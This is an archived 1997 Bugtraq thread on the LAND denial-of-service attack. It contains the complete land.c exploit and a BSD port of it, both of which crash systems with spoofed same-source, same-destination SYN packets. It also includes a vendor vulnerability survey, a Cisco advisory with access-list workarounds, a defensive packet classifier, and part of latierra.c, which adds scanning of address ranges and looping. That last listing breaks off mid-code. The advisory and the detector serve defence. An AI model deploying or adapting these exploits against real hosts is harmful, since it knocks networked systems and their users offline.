The LAND attack (IP DOS)

Summary
Description: Sending a packet to a machine with the source host/port the same as the destination host/port crashes a lot of boxes.
Author: m3lt <meltman@LAGGED.NET>
Compromise: Remote DOS attack (reboots many systems)
Vulnerable Systems: Windows95, Windows NT 4.0, WfWG 3.11, FreeBSD
Date: 20 November 1997
Details


Date: Thu, 20 Nov 1997 19:40:19 -0500
From: m3lt <meltman@LAGGED.NET>
To: BUGTRAQ@NETSPACE.ORG
Subject: new TCP/IP bug in win95

hi,

        i recently discovered a bug which freezes win95 boxes.  here's how
it works: send a spoofed packet with the SYN flag set from a host, on an open
port (such as 113 or 139), setting as source the SAME host and port
(ie: 10.0.0.1:139 to 10.0.0.1:139).  this will cause the win95 machine to lock
up.

        the piece of code included in this message does that, so...  have fun!

        i haven't tested this bug on other platforms, i don't have the
resources.  please feel free to do so.

m3lt
meltman@lagged.net

--- snip snip -----------------------------------------------------------

/* land.c by m3lt, FLC
   crashes a win95 box */

#include <stdio.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/ip_tcp.h>
#include <netinet/protocols.h>

struct pseudohdr
{
        struct in_addr saddr;
        struct in_addr daddr;
        u_char zero;
        u_char protocol;
        u_short length;
        struct tcphdr tcpheader;
};

u_short checksum(u_short * data,u_short length)
{
        register long value;
        u_short i;

        for(i=0;i<(length>>1);i++)
                value+=data[i];

        if((length&1)==1)
                value+=(data[i]<<8);

        value=(value&65535)+(value>>16);

        return(~value);
}

int main(int argc,char * * argv)
{
        struct sockaddr_in sin;
        struct hostent * hoste;
        int sock;
        char buffer[40];
        struct iphdr * ipheader=(struct iphdr *) buffer;
        struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct iphdr));
        struct pseudohdr pseudoheader;

        fprintf(stderr,"land.c by m3lt, FLC\n");

        if(argc<3)
        {
                fprintf(stderr,"usage: %s IP port\n",argv[0]);
                return(-1);
        }

        bzero(&sin,sizeof(struct sockaddr_in));
        sin.sin_family=AF_INET;

        if((hoste=gethostbyname(argv[1]))!=NULL)
                bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length);
        else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1)
        {
                fprintf(stderr,"unknown host %s\n",argv[1]);
                return(-1);
        }

        if((sin.sin_port=htons(atoi(argv[2])))==0)
        {
                fprintf(stderr,"unknown port %s\n",argv[2]);
                return(-1);
        }

        if((sock=socket(AF_INET,SOCK_RAW,255))==-1)
        {
                fprintf(stderr,"couldn't allocate raw socket\n");
                return(-1);
        }

        bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr));
        ipheader->version=4;
        ipheader->ihl=sizeof(struct iphdr)/4;
        ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr));
        ipheader->id=htons(0xF1C);
        ipheader->ttl=255;
        ipheader->protocol=IP_TCP;
        ipheader->saddr=sin.sin_addr.s_addr;
        ipheader->daddr=sin.sin_addr.s_addr;

        tcpheader->th_sport=sin.sin_port;
        tcpheader->th_dport=sin.sin_port;
        tcpheader->th_seq=htonl(0xF1C);
        tcpheader->th_flags=TH_SYN;
        tcpheader->th_off=sizeof(struct tcphdr)/4;
        tcpheader->th_win=htons(2048);

        bzero(&pseudoheader,12+sizeof(struct tcphdr));
        pseudoheader.saddr.s_addr=sin.sin_addr.s_addr;
        pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;
        pseudoheader.protocol=6;
        pseudoheader.length=htons(sizeof(struct tcphdr));
        bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
        tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));

        if(sendto(sock,buffer,sizeof(struct iphdr)+sizeof(struct tcphdr),0,(struct sockaddr *) &sin,sizeof(struct sockaddr_in))==-1)
        {
                fprintf(stderr,"couldn't send packet\n");
                return(-1);
        }

        fprintf(stderr,"%s:%s landed\n",argv[1],argv[2]);

        close(sock);
        return(0);
}

--- snip snip -----------------------------------------------------------


Date: Mon, 24 Nov 1997 23:53:16 -0600
From: Aleph One 
To: BUGTRAQ@NETSPACE.ORG
Subject: Re: "LAND" Attack Update

This is the last "LAND" update. I will not post any more. This list is not
meant to be comprehensive nor accurate. For an accurate assessment of the
risk to your IP stack contact your vendor.

Cisco Field Notice: TCP Loopback Denial-of-Service Attack and Cisco Devices
http://www.cisco.com/warp/public/770/land-pub.shtml

Read "Network Ingress Filtering: Defeating Denial of Service Address Spoofing"
ftp://ietf.org/internet-drafts/draft-ferguson-ingress-filtering-03.txt

The survey says:

AIX 3                                   IS  vulnerable
AIX 3.2                                 NOT vulnerable
AIX 4                                   NOT vulnerable
AIX 4.1                                 NOT vulnerable
AIX 4.2.1                               NOT vulnerable
AmigaOS AmiTCP 4.0demo                  NOT vulnerable
AmigaOS AmiTCP 4.2 (Kickstart 3.0)      IS  vulnerable
AmigaOS Miami 2.0                       NOT vulnerable
AmigaOS Miami 2.1f                      NOT vulnerable
AmigaOS Miami 2.1p                      NOT vulnerable
AmigaOS Miami 2.92c                     NOT vulnerable
BeOS Preview Release 2 PowerMac         IS  vulnerable
BSDI 2.0                                IS  vulnerable
BSDI 2.1 (vanilla)                      IS  vulnerable
BSDI 2.1 (K210-021,K210-022,K210-024)   NOT vulnerable
BSDI 3.0                                NOT vulnerable
DG/UX R4.12                             NOT vulnerable
Digital UNIX 3.2c                       NOT vulnerable
Digital UNIX 4.0                        NOT vulnerable
Digital VMS ???                         IS  vulnerable
FreeBSD 2.1.6-RELEASE                   NOT vulnerable
FreeBSD 2.2.2-RELEASE                   NOT vulnerable
FreeBSD 2.2.5-RELEASE                   IS  vulnerable
FreeBSD 2.2.5-STABLE                    IS  vulnerable (fixed)
FreeBSD 3.0-CURRENT                     IS  vulnerable (fixed)
HP External JetDirect Print Servers     IS  vulnerable
HP-UX 9.03                              NOT vulnerable
HP-UX 10.01                             NOT vulnerable
HP-UX 10.20                             NOT vulnerable
IBM AS/400 OS7400 3.7                   IS  vulnerable (100% CPU)
IRIX 5.2                                IS  vulnerable
IRIX 5.3                                IS  vulnerable
IRIX 6.2                                NOT vulnerable
IRIX 6.3                                NOT vulnerable
IRIX 6.4                                NOT vulnerable
Linux 1.2.13                            NOT vulnerable
Linux 2.1.65                            NOT vulnerable
Linux 2.0.30                            NOT vulnerable
Linux 2.0.32                            NOT vulnerable
MacOS MacTCP                            IS  vulnerable
MacOS OpenTransport 1.1.1               NOT vulnerable
MacOS 7.1p6                             NOT vulnerable
MacOS 7.5.1                             NOT vulnerable
MacOS 7.6.1 OpenTransport 1.1.2         IS  vulnerable (not a complete lockup)
MacOS 8.0                               IS  vulnerable (TCP/IP stack crashed)
MVS OS390 1.3                           NOT vulnerable
NetApp NFS server 4.1d                  IS  vulnerable
NetApp NFS server 4.3                   IS  vulnerable
NetBSD 1.1                              IS  vulnerable
NetBSD 1.2                              IS  vulnerable
NetBSD 1.2a                             IS  vulnerable
NetBSD 1.2.1                            IS  vulnerable (fixed)
NetBSD 1.3_ALPHA                        IS  vulnerable (fixed)
NeXTSTEP 3.0                            IS  vulnerable
NeXTSTEP 3.1                            IS  vulnerable
Novell 4.11                             IS  vulnerable (100% CPU for 30 secs)
OpenBSD 2.1                             (conflicting reports)
OpenBSD 2.2                             NOT vulnerable
OpenVMS 7.1 with UCX 4.1-7              IS  vulnerable
OS/2 3.0                                NOT vulnerable
OS/2 4.0                                NOT vulnerable
QNX 4.24                                IS  vulnerable
Rhapsody Developer Release              IS  vulnerable
SCO OpenServer 5.0.2 SMP                IS  vulnerable
SCO OpenServer 5.0.4                    IS  vulnerable (kills networking)
SCO Unixware 2.1.1                      IS  vulnerable
SCO Unixware 2.1.2                      IS  vulnerable
Solaris 2.4                             NOT vulnerable
Solaris 2.5.1                           NOT vulnerable
Solaris 2.5.2                           NOT vulnerable
Solaris 2.6                             NOT vulnerable
SunOS 4.1.3                             IS  vulnerable
SunOS 4.1.4                             IS  vulnerable
Ultrix ???                              NOT vulnerable
Windows 95 (vanilla)                    IS  vulnerable
Windows 95 + Winsock 2 + VIPUPD.EXE     IS  vulnerable
Windows NT (vanilla)                    IS  vulnerable
Windows NT + SP3                        IS  vulnerable
Windows NT + SP3 + simptcp-fix          IS  vulnerable

Some misc stuff:

3Com Accessbuilder 600/700              NOT vulnerable
3Com LinkSwitch 1000                    NOT vulnerable
3Com OfficeConnect 500                  NOT vulnerable
3Com SuperStack II Switch 1000          IS  vulnerable
Adtran TSU Rack                         NOT vulnerable
Apple LaserWriter                       IS  vulnerable
Ascend 4000 5.0Ap20                     NOT vulnerable
Ascend Pipeline 50 rev 5.0Ai16          NOT vulnerable
Ascend Pipeline 50 rev 5.0Ap13          NOT vulnerable
BayNetworks MARLIN 1000 OS (0).3.024(R) NOT vulnerable
BinTec BIANCA/BRICK-XS 4.6.1 router     IS  vulnerable
Cisco Classic IOS < 10.3, early 10.3, 11.0, 11.1, and 11.2 IS vulnerable
Cisco IOS/700                           IS  vulnerable
Cisco Catalyst                          IS  vulnerable
Digital VT1200                          IS  vulnerable
Farallon Netopia PN440                  NOT vulnerable
HP Envizex Terminal                     IS  vulnerable
LaserJet Printer                        NOT vulnerable
Livingston Office Router (ISDN)         IS  vulnerable
Livingston PM ComOS 3.3.3               NOT vulnerable
Livingston PM ComOS 3.5b17 + 3.7.2      NOT vulnerable
Livingston PM ComOS 3.7L                NOT vulnerable
Livingston PM ComOS 3.7.2               NOT vulnerable
Livingston Enterprise PM 3.4 2L         NOT vulnerable
Livingston T1/E1 OR                     IS  vulnerable
Milkyway Blackhole Firewall 3.0 (SunOS) IS  vulnerable
Milkyway Blackhole Firewall 3.02(SunOS) IS  vulnerable
NCD X Terminals, NCDWare v3.1.0         IS  vulnerable
NCD X Terminals, NCDWare v3.2.1         IS  vulnerable
Netopia PN440 v2.0.1                    IS  vulnerable
Proteon GT60                            NOT vulnerable
Proteon GT60Secure                      NOT vulnerable
Proteon GT70                            NOT vulnerable
Proteon GT70Secure                      NOT vulnerable
Proteon GTAM                            NOT vulnerable
Proteon GTX250                          NOT vulnerable
Proteon RBX250                          NOT vulnerable
Sonix Arpeggio                          NOT vulnerable
Sonix Arpeggio +                        NOT vulnerable
Sonix Arpeggio Lite                     NOT vulnerable

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01



Date: Fri, 21 Nov 1997 10:58:39 -0800
From: blast 
To: BUGTRAQ@NETSPACE.ORG
Subject: 44BSD port of land.c

For those of you who don't have all the "fancy" LINUX
networking includes, here is a port to 44BSD flavors.
Should compile fine on FreeBSD, NetBSD, OpenBSD, BSDi, etc.
Enjoy.
-blast
   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
   \    Tim Keanini    |         "The limits of my language,            /
   /                   |         are the limits of my world."           \
   \ blast@broder.com  |         --Ludwig Wittgenstein                  /
   \                   +================================================/
   |Key fingerprint =  7B 68 88 41 A8 74 AB EC  F0 37 98 4C 37 F7 40 D6 |
   /    PUB KEY: http://www-swiss.ai.mit.edu/~bal/pks-commands.html     \
   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%


/* land.c by m3lt, FLC
   crashes a win95 box
   Ported by blast and jerm to 44BSD*/

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 


/* #include  */
/* #include  */

struct pseudohdr
{
        struct in_addr saddr;
        struct in_addr daddr;
        u_char zero;
        u_char protocol;
        u_short length;
        struct tcphdr tcpheader;
};

u_short checksum(u_short * data,u_short length)
{
        register long value;
        u_short i;

        for(i=0;i<(length>>1);i++)
                value+=data[i];

        if((length&1)==1)
                value+=(data[i]<<8);

        value=(value&65535)+(value>>16);

        return(~value);
}

int main(int argc,char * * argv)
{
        struct sockaddr_in sin;
        struct hostent * hoste;
        int sock,foo;
        char buffer[40];
        struct ip * ipheader=(struct ip *) buffer;
        struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct ip));
        struct pseudohdr pseudoheader;

        fprintf(stderr,"land.c by m3lt mod by blast, FLC\n");

        if(argc<3)
        {
                fprintf(stderr,"usage: %s IP port\n",argv[0]);
                return(-1);
        }

        bzero(&sin,sizeof(struct sockaddr_in));
        sin.sin_family=AF_INET;

        if((hoste=gethostbyname(argv[1]))!=NULL)
                bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length);
        else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1)
        {
                fprintf(stderr,"unknown host %s\n",argv[1]);
                return(-1);
        }

        if((sin.sin_port=htons(atoi(argv[2])))==0)
        {
                fprintf(stderr,"unknown port %s\n",argv[2]);
                return(-1);
        }

        if((sock=socket(AF_INET,SOCK_RAW,255))==-1)
        {
                fprintf(stderr,"couldn't allocate raw socket\n");
                return(-1);
        }

        foo=1;
        if(setsockopt(sock,0,IP_HDRINCL,&foo,sizeof(int))==-1)
        {
                fprintf(stderr,"couldn't set raw header on socket\n");
                return(-1);
        }

        bzero(&buffer,sizeof(struct ip)+sizeof(struct tcphdr));
        ipheader->ip_v=4;
        ipheader->ip_hl=sizeof(struct ip)/4;
        ipheader->ip_len=sizeof(struct ip)+sizeof(struct tcphdr);
        ipheader->ip_id=htons(0xF1C);
        ipheader->ip_ttl=255;
        ipheader->ip_p=IPPROTO_TCP;
        ipheader->ip_src=sin.sin_addr;
        ipheader->ip_dst=sin.sin_addr;

        tcpheader->th_sport=sin.sin_port;
        tcpheader->th_dport=sin.sin_port;
        tcpheader->th_seq=htonl(0xF1C);
        tcpheader->th_flags=TH_SYN;
        tcpheader->th_off=sizeof(struct tcphdr)/4;
        tcpheader->th_win=htons(2048);

        bzero(&pseudoheader,12+sizeof(struct tcphdr));
        pseudoheader.saddr.s_addr=sin.sin_addr.s_addr;
        pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;
        pseudoheader.protocol=6;
        pseudoheader.length=htons(sizeof(struct tcphdr));
        bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
        tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));

        if(sendto(sock,buffer,sizeof(struct ip)+sizeof(struct tcphdr),0,(struct sockaddr *) &sin,sizeof(struct sockaddr_in))==-1)
        {
                fprintf(stderr,"couldn't send packet,%d\n",errno);
                return(-1);
        }

        fprintf(stderr,"%s:%s landed\n",argv[1],argv[2]);

        close(sock);
        return(0);
}




Date: Fri, 21 Nov 1997 14:38:14 -0800
From: John Bashinski 
To: BUGTRAQ@NETSPACE.ORG
Subject: Field Notice: TCP loopback DoS Attack (land.c) and Cisco Devices

-----BEGIN PGP SIGNED MESSAGE-----

Field Notice:
TCP loopback DoS Attack (land.c) and Cisco Devices

November 21, 1997, 14:00 AM US/Pacific, Revision 1
- --------------------------------------------------

Summary
- -----
Somebody has released a program, known as land.c, which  can be used to
launch denial of service attacks against various TCP implementations. The
program sends a TCP SYN packet (a connection initiation), giving the target
host's address as both source and destination, and using the same port on
the target host as both source and destination.

Classic IOS software (used on Cisco routers with product numbers greater
than 1000, on the CGS/MGS/AGS+,  and on the CS-500) is moderately vulnerable
to this attack.  For some IOS versions, if the attack is launched against a
TCP port that is actually listening (say the TELNET port), then invalid
connection data will be created, preventing further legitimate connections
for approximately 30 seconds. High CPU loads may result on some IOS
versions. We observed a complete hang on one 11.5 system, but have been
unable to reproduce that failure. Based on very preliminary data, the
router's packet forwarding functions are not generally affected.

IOS/700 (used on Cisco 7xx routers) is also vulnerable. The  7xx
vulnerability is more devastating than the classic IOS vulnerability, but
probably less dangerous for most customers, since firewalls separate most
7xx routers from the Internet.

The PIX firewall does not appear to be affected. Initial testing of
the Centri firewall tends to indicate that it is not affected.

We're working on characterizing other products' vulnerability to attack.
Updates will be issued as information becomes available.

Who is Affected
- -------------
All IOS and IOS/700 systems that can be reached via TCP from untrusted hosts
are affected, provided that the reachable TCP ports are ports on which IOS
ordinarily provides service. The attack requires spoofing the target's own
address, so systems behind effective anti-spoofing firewalls are safe.

Impact
- ----
Classic IOS systems may experience slowdowns while under active attack. On
IOS software versions earlier than 11.2(4), new TCP connections will fail
for a period of about 30 seconds after any attack packet is received. IOS
versions later than 11.2(4), or that contain the fix for bug ID CSCdi87533,
may experience slowdowns, but should continue to accept new TCP connections.
Most IOS versions appear to recover completely within a few minutes of the
attack stopping, but we have not yet fully characterized the effect on all
IOS versions. One complete failure was observed; the version was 11.1(5).  A
configuration workaround for classic IOS can prevent the problem entirely,
subject to performance restrictions.

IOS/700 systems subjected to the attack will hang indefinitely and must be
physically reset.  A configuration workaround for IOS/700 can prevent the
problem entirely.

Initial tests indicate that the PIX firewall is not vulnerable to this
attack. Tests have been conducted with version 4.1.3.245 and 4.0.7.

Initial tests indicate that the Centri  firewall  (build 4.110) is not
vulnerable to this attack with no exposed service configured. We have not
yet tested the Centri product with exposed services.

Workaround for Classic IOS
- ------------------------
Classic IOS users can use input access lists on their interfaces to prevent
the attack packets from entering their TCP stacks. This will prevent the
attack entirely, but may have unacceptable performance impacts on heavily
loaded high-end routers. Traffic will still be fast-switched, but
higher-speed switching modes may be disabled. It should be tried with care.

If you have no existing input access lists, create a new IP extended access
list. Use a presently-unused number between 100 and 199. The access list
must have an entry for each of the IP addresses configured on the system.
Deny packets from each address to itself.  For example:

    access-list 101 deny tcp 1.2.3.4 0.0.0.0 1.2.3.4 0.0.0.0
    access-list 101 deny tcp 5.6.7.8 0.0.0.0 5.6.7.8 0.0.0.0
    access-list 101 permit ip 0.0.0.0 255.255.255.255 0.0.0.0 255.255.255.255

If you have existing access lists, you'll need to merge the new entries in
an appropriate way, generally at the top of the list. The access list should
be applied incoming on all interfaces, so a fragment of a total router
configuration might look like this:

    interface ethernet 0
    ip address 1.2.3.4 255.255.255.0
    ip access-group 101 in
    !
    interface ethernet 1
    ip address 5.6.7.8
    ip access-group 101 in
    !
    access-list 101 deny tcp 1.2.3.4 0.0.0.0 1.2.3.4 0.0.0.0
    access-list 101 deny tcp 5.6.7.8 0.0.0.0 5.6.7.8 0.0.0.0
    access-list 101 permit ip 0.0.0.0 255.255.255.255 0.0.0.0 255.255.255.255

Workaround for IOS/700
- --------------------
Add the following configuration command to any profile that may be active
when connected to a potentially hostile network:

set ip filter tcp in source <7xx IP address> destination <7xx IP address> block

Using Cisco Products to Protect Other Systems
- -------------------------------------------
We do not believe that this attack can be used against systems behind our
dedicated firewall products, the PIX and Centri firewalls, unless
general-purpose tunnels have been enabled through the firewalls.

Properly designed anti-spoofing access lists at border routers can be used
to prevent the attack from entering a private network from the Internet. Use
the access lists to filter out packets whose IP source addresses are on your
internal net, but which are arriving from interfaces connected to the
outside Internet.

Exploitation and Public Announcements
- -----------------------------------
Cisco has had multiple reports of this vulnerability.

Most exploitation seems to be using the original program, which sends one
packet at a time. Floods of invalid packets have not been reported.

This issue has been widely discussed in a variety of Internet fora.

Cisco first heard of this problem on the morning of Friday, November 21.

Distribution of this Notice
- -------------------------
This notice is being sent to the following Internet mailing lists and
newsgroups:

   * cisco@spot.colorado.edu
   * comp.dcom.sys.cisco
   * bugtraq@netspace.org
   * first-teams@first.org (includes CERT/CC)
   * nanog@merit.edu

Updates will be sent to some or all of these, as appropriate.

This notice will be posted in the "Field Notices" section of Cisco's
Worldwide Web site, which can be found under "Technical Tips" in the
"Service and Support" section. The URL will be

     http://www.cisco.com/warp/public/770/land-pub.shtml

The copy on the Worldwide Web will be updated as appropriate.

Cisco Security Procedures
- -----------------------
Please report security issues with Cisco products to
security-alert@cisco.com.

This notice is copyright 1997 by Cisco Systems, Inc. This notice may be
redistributed freely provided that redistributed copies are complete and
unmodified, including all date and version information.




-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

-----END PGP SIGNATURE-----
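
The rule the access lists in the notice above express ("deny packets from each address to itself") can also be applied by a host, IDS or capture-analysis tool that sees raw IPv4 packets. The classifier below is an added example, not code from any poster or from Cisco; the function name, the verdict enum and the four sample packets are constructed for illustration (checksums are left at zero and are not verified).

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Verdicts (names are assumptions of this example). */
enum land_verdict {
    LAND_MALFORMED          = -1, /* too short or inconsistent lengths    */
    LAND_NONE               = 0,  /* not IPv4/TCP, or src != dst address  */
    LAND_SAME_ADDR          = 1,  /* TCP with src address == dst address:
                                     what the Cisco ACL entries deny      */
    LAND_SAME_ADDR_PORT_SYN = 2   /* also src port == dst port and SYN set:
                                     the land.c / latierra.c pattern      */
};

#define PROTO_TCP    6
#define TCP_FLAG_SYN 0x02

static uint16_t rd16(const uint8_t *p)
{
    return (uint16_t)((p[0] << 8) | p[1]);  /* network byte order */
}

/* Classify one raw IPv4 packet (starting at the IP header). */
enum land_verdict classify_land(const uint8_t *pkt, size_t len)
{
    size_t ihl, total_len;
    const uint8_t *tcp;

    if (pkt == NULL || len < 20)
        return LAND_MALFORMED;
    if ((pkt[0] >> 4) != 4)
        return LAND_NONE;                    /* only IPv4 is examined */

    ihl = (size_t)(pkt[0] & 0x0f) * 4;
    total_len = rd16(pkt + 2);
    if (ihl < 20 || ihl > len || total_len < ihl || total_len > len)
        return LAND_MALFORMED;

    if (pkt[9] != PROTO_TCP)
        return LAND_NONE;
    if (memcmp(pkt + 12, pkt + 16, 4) != 0)  /* source vs destination */
        return LAND_NONE;

    /* Addresses match. Later fragments and truncated segments carry no
       usable TCP header, so only the address-level verdict applies. */
    if ((rd16(pkt + 6) & 0x1fff) != 0 || total_len - ihl < 20)
        return LAND_SAME_ADDR;

    tcp = pkt + ihl;
    /* latierra.c defaults to SYN|PUSH, so test the SYN bit, not equality. */
    if (rd16(tcp) == rd16(tcp + 2) && (tcp[13] & TCP_FLAG_SYN))
        return LAND_SAME_ADDR_PORT_SYN;
    return LAND_SAME_ADDR;
}

/* Constructed samples: 20-byte IP header followed by 20-byte TCP header. */
const uint8_t sample_land[40] = {       /* 10.0.0.1:139 -> 10.0.0.1:139, SYN */
    0x45,0x00,0x00,0x28, 0x0f,0x1c,0x00,0x00, 0xff,0x06,0x00,0x00,
    0x0a,0x00,0x00,0x01, 0x0a,0x00,0x00,0x01,
    0x00,0x8b,0x00,0x8b, 0x00,0x00,0x0f,0x1c, 0x00,0x00,0x00,0x00,
    0x50,0x02,0x08,0x00, 0x00,0x00,0x00,0x00 };
const uint8_t sample_latierra[40] = {   /* same, but SYN|PUSH, window 0xFDE8 */
    0x45,0x00,0x00,0x28, 0x0f,0x1c,0x00,0x00, 0xff,0x06,0x00,0x00,
    0x0a,0x00,0x00,0x01, 0x0a,0x00,0x00,0x01,
    0x00,0x8b,0x00,0x8b, 0x00,0x00,0x0f,0x1c, 0x00,0x00,0x00,0x00,
    0x50,0x0a,0xfd,0xe8, 0x00,0x00,0x00,0x00 };
const uint8_t sample_same_addr[40] = {  /* 10.0.0.1:1025 -> 10.0.0.1:139 */
    0x45,0x00,0x00,0x28, 0x0f,0x1c,0x00,0x00, 0xff,0x06,0x00,0x00,
    0x0a,0x00,0x00,0x01, 0x0a,0x00,0x00,0x01,
    0x04,0x01,0x00,0x8b, 0x00,0x00,0x0f,0x1c, 0x00,0x00,0x00,0x00,
    0x50,0x02,0x08,0x00, 0x00,0x00,0x00,0x00 };
const uint8_t sample_normal[40] = {     /* 10.0.0.2:1025 -> 10.0.0.1:139 */
    0x45,0x00,0x00,0x28, 0x0f,0x1c,0x00,0x00, 0xff,0x06,0x00,0x00,
    0x0a,0x00,0x00,0x02, 0x0a,0x00,0x00,0x01,
    0x04,0x01,0x00,0x8b, 0x00,0x00,0x0f,0x1c, 0x00,0x00,0x00,0x00,
    0x50,0x02,0x08,0x00, 0x00,0x00,0x00,0x00 };

int main(void)
{
    const uint8_t *samples[] = { sample_land, sample_latierra,
                                 sample_same_addr, sample_normal };
    const char *names[] = { "land", "latierra", "same-addr", "normal" };
    size_t i;

    for (i = 0; i < 4; i++)
        printf("%-10s verdict=%d\n", names[i],
               (int)classify_land(samples[i], 40));
    return 0;
}
```

A verdict of 1 or 2 on a packet arriving from the network is never legitimate traffic, so either can be dropped and logged; verdict 2 distinguishes the published tools from other same-address spoofing.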


Date: Wed, 26 Nov 1997 09:29:04 -0800
From: "Kelly E. Gibbs" 
To: BUGTRAQ@NETSPACE.ORG
Subject: Dos against NT4-SP3 and 95 [latierra.c]

Found this on www.rootshell.com, seems to work all too well
against NT4-SP3, and crashes 95.

/**************************************************************/
/*                                                            */
/*  La Tierra v1.0b  - by MondoMan (KeG), elmondo@usa.net     */
/*                                                            */
/*  Modified version of land.c by m3lt, FLC                   */
/*                                                            */
/*  Compiled on RedHat Linux 2.0.27, Intel Pentium 200Mhz     */
/*  gcc version 2.7.2.1       tabs set to 3                   */
/*                                                            */
/*  gcc latierra.c -o latierra                                */
/*                                                            */
/*  Refer to readme.txt for more details and history          */
/*                                                            */
/**************************************************************/
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#define DEFAULT_FREQUENCY  1
#define TRUE       1
#define FALSE        0
#define FOR_EVER      -5
#define LIST_FILE      1
#define ZONE_FILE      2
#define MAXLINELENGTH    512
#define DEFAULT_SEQ    0xF1C
#define DEFAULT_TTL           0xFF
#define DEFAULT_TCPFLAGS      (TH_SYN | TH_PUSH)
#define DEFAULT_WINSIZE       0xFDE8
struct pseudohdr
 {
   struct in_addr saddr;
   struct in_addr daddr;
   u_char zero;
   u_char protocol;
   u_short length;
   struct tcphdr tcpheader;
 };
typedef struct latierra_data
 {
 char dest_ip[256];
 int  tcp_flags;
 int  window_size;
 int  ip_protocol;
 int  sequence_number;
 int  ttl;
 int  supress_output;
        int  message_type;
 } LATIERRA_DATA;
void alternatives(void);
int  get_ip(int use_file, FILE *fp, char *buff);
int  land(LATIERRA_DATA *ld, int port_number);
void nslookup_help(void);
void print_arguments(void);
void protocol_list(void);
/********/
/* main */
/********/
int main(int argc, char **argv)
{
 FILE *fp;
 LATIERRA_DATA ld;
 int frequency = DEFAULT_FREQUENCY, x;
 int beginning_port=1, octet=1, scan_loop=0, loop_val=0, use_file=FALSE;
 int ending_port = 0, loop = TRUE, i = 0, increment_addr = FALSE;
   char got_ip = FALSE, got_beg_port = FALSE;
 char class_c_addr[21], filename[256], buff[512], valid_tcp_flags[16];
 printf("\nlatierra v1.0b by MondoMan (elmondo@usa.net), KeG\n");
   printf("Enhanced version of land.c originally developed by m3lt, FLC\n");
 strcpy(valid_tcp_flags, "fsrpau");
 ld.tcp_flags = 0;
 ld.window_size = DEFAULT_WINSIZE;
 ld.ip_protocol = IP_TCP;
 ld.sequence_number = DEFAULT_SEQ;
 ld.ttl = DEFAULT_TTL;
 ld.message_type = 0;

 if(argc > 1 && (!strcmp(argv[1], "-a")))
  alternatives();
 if(argc > 1 && (!strcmp(argv[1], "-n")))
  nslookup_help();
 if(argc > 1 && (!strcmp(argv[1], "-p")))
  protocol_list();
 if(argc == 1 || ( (argc >= 2) && (!strcmp(argv[1], "-h"))))
  print_arguments();
 while((i = getopt(argc, argv, "i:b:e:s:l:o:t:w:p:q:v:m:")) != EOF)
  {
  switch(i)
   {
   case 't':
    for(x=0;x 1)
     strcpy(ld.dest_ip, optarg);
    else
     {
     printf("ERROR: Must specify valid IP or hostname.\n");
     return(-6);
     }
    got_ip = TRUE;
    break;
   case 's':
    frequency = atoi(optarg);
    break;
   case 'l':
    loop = atoi(optarg);
    break;
   case 'b':
    beginning_port = atoi(optarg);
    got_beg_port = TRUE;
    break;
   case 'e':
    ending_port = atoi(optarg);
    break;
   }
  }
 if(!ld.tcp_flags)
  ld.tcp_flags = DEFAULT_TCPFLAGS;
 if(!got_beg_port)
  {
  fprintf(stderr, "\nMust specify beginning port number.  Use -h for help with arguments.\n\n");
  return(-7);
  }
 if(ending_port == 0)
  ending_port = beginning_port;
 printf("\nSettings:\n\n");
   printf("  (-i)   Dest. IP Addr   : ");
 if(ld.dest_ip[strlen(ld.dest_ip) -1] == '-')
  {
  ld.dest_ip[strlen(ld.dest_ip)-1] = 0x0;
  strcpy(class_c_addr, ld.dest_ip);
  strcat(ld.dest_ip, "1");
  printf(" %s (Class C range specified).\n", ld.dest_ip);
  increment_addr = TRUE;
  octet = 1;
  }
 else
  if(strlen(ld.dest_ip) > 5)
   {
   if(strncmp(ld.dest_ip, "zone=", 5)==0)
    {
    strcpy(filename, &ld.dest_ip[5]);
    printf("%s (using DNS zone file)\n", filename);
    use_file = ZONE_FILE;
    }
   else if(strncmp(ld.dest_ip, "list=", 5) == 0)
    {
    strcpy(filename, &ld.dest_ip[5]);
    printf("%s (using ASCII list)\n", filename);
    use_file = LIST_FILE;
    }
   else
    printf("%s\n", ld.dest_ip);
   }
  else
   {
   printf("Destination specifier (%s) length must be > 7.\n", ld.dest_ip);
   return(-9);
   }
 printf("  (-b)   Beginning Port #: %d\n",     beginning_port );
 printf("  (-e)   Ending Port #   : %d\n",     ending_port );
 printf("  (-s)   Seconds to Pause: %d\n",     frequency );
 printf("  (-l)   Loop            : %d %s\n",  loop, (loop == FOR_EVER) ? "(forever)" : " " );
 printf("  (-w)   Window size     : %d\n",     ld.window_size );
 printf("  (-q)   Sequence Number : %X (%d)\n",ld.sequence_number, ld.sequence_number );
 printf("  (-v)   Time-to-Live    : %d\n",     ld.ttl);
 printf("  (-p)   IP Protocol #   : %d\n",     ld.ip_protocol );
